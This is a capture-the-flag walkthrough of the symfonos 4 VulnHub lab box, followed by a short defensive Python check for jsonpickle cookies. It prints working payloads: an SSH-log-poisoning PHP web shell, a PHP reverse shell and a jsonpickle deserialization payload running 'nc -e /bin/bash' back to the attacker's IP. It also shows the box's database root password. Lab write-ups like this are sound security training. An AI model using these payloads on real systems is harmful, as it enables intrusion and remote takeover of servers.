【攻略鸭】symfonos 4 VulnHub Box Walkthrough

The content of this article is purely fictional. 攻略鸭 asks for your follows and likes on Bilibili!
Target IP address: 192.168.31.215
Attacking machine IP address: 192.168.31.38
External information gathering
Visiting http://192.168.31.215/ shows only a single image.
Port scan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10 (protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))
Web directory enumeration
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.215/FUZZ -e .php,.txt -c
/gods
/atlantis.php
/sea.php
Visiting http://192.168.31.215/gods/ reveals three log files, hades.log, zeus.log and poseidon.log, each an introduction to a mythological figure.
Searching the returned content in a search engine shows it to be the output of the uptime command.
Visiting http://192.168.31.215/atlantis.php shows a login form.
Logging in with a classic SQL-injection authentication-bypass payload returns a 302 redirect to sea.php. Clicking the hades option changes the URL to http://192.168.31.215/sea.php?file=hades, and the page shows the contents of hades.log.
Testing for file inclusion
GET /sea.php?file=../../../../../../etc/passwd
GET /sea.php?file=../../../../../etc/passwd%00
Both fail.
Since hades.log, zeus.log and poseidon.log all carry the .log suffix, the script presumably appends .log itself, so try including a log file without its extension:
GET /sea.php?file=../../../../../var/log/auth
The SSH authentication log is returned.
ssh '<?php phpinfo(); ?>'@192.168.31.215
GET /sea.php?file=../../../../../var/log/auth
Requesting the log again now renders the phpinfo page: the username written into auth.log is executed by the include.
ssh '<?php system($_GET['cmd']); ?>'@192.168.31.215
GET /sea.php?cmd=id&file=../../../../../var/log/auth
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ nc -nvlp 9000
GET /sea.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.31.38%22%2C9000%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&file=../../../../../var/log/auth
$ python -c 'import pty;pty.spawn("/bin/bash")'
Local information gathering
www-data@MiWiFi-R3600-srv:/var/www/html$ cat atlantis.php
<?php
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'yVzyRGw3cG2Uyt2r');
$db = new PDO("mysql:host=localhost:3306;dbname=db", DB_USERNAME,DB_PASSWORD);
// $username and $pwd are concatenated into the SQL string unescaped; this is the injection used to bypass the login
$statement = $db->prepare("Select * from users where username='".$username."' and pwd='".$pwd."'");
$statement->execute();
www-data@MiWiFi-R3600-srv:/var/www/html$ cat sea.php
<?php
// the file parameter is used as-is, with only "gods/" prepended and ".log" appended: local file inclusion
include("gods/". $_GET['file']. '.log');
?>
www-data@MiWiFi-R3600-srv:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
poseidon:x:1000:1000:,,,:/home/poseidon:/bin/bash
Locally listening ports
tcp LISTEN 0 128 127.0.0.1:8080 0.0.0.0:*
Useful software:
/usr/bin/base64
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/socat
/usr/bin/wget
The /opt folder is usually empty; here /opt/code exists.
www-data@symfonos4:/opt/code$ ls -alh
drwxr-xrwx 4 root root 4.0K Aug 19 2019 .
drwxr-xr-x 3 root root 4.0K Aug 18 2019 ..
-rw-r--r-- 1 root root 942 Aug 19 2019 app.py
-rw-r--r-- 1 root root 1.5K Aug 19 2019 app.pyc
drwxr-xr-x 4 root root 4.0K Aug 19 2019 static
drwxr-xr-x 2 root root 4.0K Aug 19 2019 templates
-rw-r--r-- 1 root root 215 Aug 19 2019 wsgi.pyc
cat app.py
app.py uses jsonpickle.
Forward port 8080 with socat:
socat TCP-LISTEN:8081,fork TCP:127.0.0.1:8080
Visit http://192.168.31.215:8081/whoami
Cookie: PHPSESSID=q7ctie2m9dp9fhv48m82t28204; username=eyJweS9vYmplY3QiOiAiYXBwLlVzZXIiLCAidXNlcm5hbWUiOiAiUG9zZWlkb24ifQ==
Base64-decoding the username cookie gives: {"py/object": "app.User", "username": "Poseidon"}
flask-json-pickle vulnerability
Searching for "jsonpickle exploit" turns up the flask-json-pickle vulnerability; the exploit payload:
{"py/object": "__main__.Shell", "py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": ["whoami"]}, null, null, null]}
Start a listener on the attacking machine: nc -nvlp 3334
Change the command-execution callable to os.system, giving:
{"py/object":"__main__.Shell","py/reduce":[{"py/type":"os.system"},{"py/tuple":["/usr/bin/nc -e /bin/bash 192.168.31.38 3334"]},null,null,null]}
After base64-encoding it and sending it as the cookie, a shell comes back:
id
uid=0(root) gid=0(root) groups=0(root)
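Added example, not from the original walkthrough or the box's app.py: a defender-side check that decodes the base64 username cookie and rejects any jsonpickle document carrying py/reduce, py/type or similar control tags, or a py/object tag outside an allowlist, before the value ever reaches jsonpickle.decode(). The allowlist containing only app.User and the sample cookies are assumptions constructed here.

```python
import base64
import json

# Assumed allowlist: the only class the app legitimately serialises into the cookie.
ALLOWED_OBJECTS = {"app.User"}
# jsonpickle control tags that let a document construct arbitrary types or call callables.
DANGEROUS_KEYS = {"py/reduce", "py/type", "py/function", "py/repr", "py/newargs", "py/newargsex"}


def audit_jsonpickle_doc(doc):
    """Walk a parsed JSON document; return reasons it must not be passed to jsonpickle.decode()."""
    problems = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                if key in DANGEROUS_KEYS:
                    problems.append(f"{path}: control tag {key!r}")
                elif key == "py/object" and value not in ALLOWED_OBJECTS:
                    problems.append(f"{path}: object tag {value!r} not in allowlist")
                walk(value, f"{path}/{key}")
        elif isinstance(node, list):
            for i, item in enumerate(node):
                walk(item, f"{path}[{i}]")

    walk(doc, "$")
    return problems


def check_username_cookie(cookie_value):
    """Return (ok, problems) for a base64 username cookie; ok is True only when it is safe to decode."""
    try:
        doc = json.loads(base64.b64decode(cookie_value, validate=True))
    except ValueError as exc:  # binascii.Error and JSONDecodeError are both ValueError subclasses
        return False, [f"cookie is not base64-encoded JSON: {exc}"]
    problems = audit_jsonpickle_doc(doc)
    return not problems, problems


def encode_cookie(doc):
    """Encode a document the way the app's cookie is encoded: base64 of its JSON text."""
    return base64.b64encode(json.dumps(doc).encode()).decode()


# Constructed samples, not captured traffic: the legitimate session cookie and the whoami gadget shape.
BENIGN_COOKIE = encode_cookie({"py/object": "app.User", "username": "Poseidon"})
GADGET_COOKIE = encode_cookie({"py/object": "__main__.Shell", "py/reduce": [
    {"py/type": "subprocess.Popen"}, {"py/tuple": ["whoami"]}, None, None, None]})

if __name__ == "__main__":
    for name, cookie in (("benign", BENIGN_COOKIE), ("gadget", GADGET_COOKIE)):
        print(name, check_username_cookie(cookie))
```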
Other
Flag
# cat /root/proof.txt
Congrats on rooting symfonos:3!
Questions
1. In the flask-json-pickle exploit, methods other than nc did not succeed;
2. Are there other privilege-escalation paths?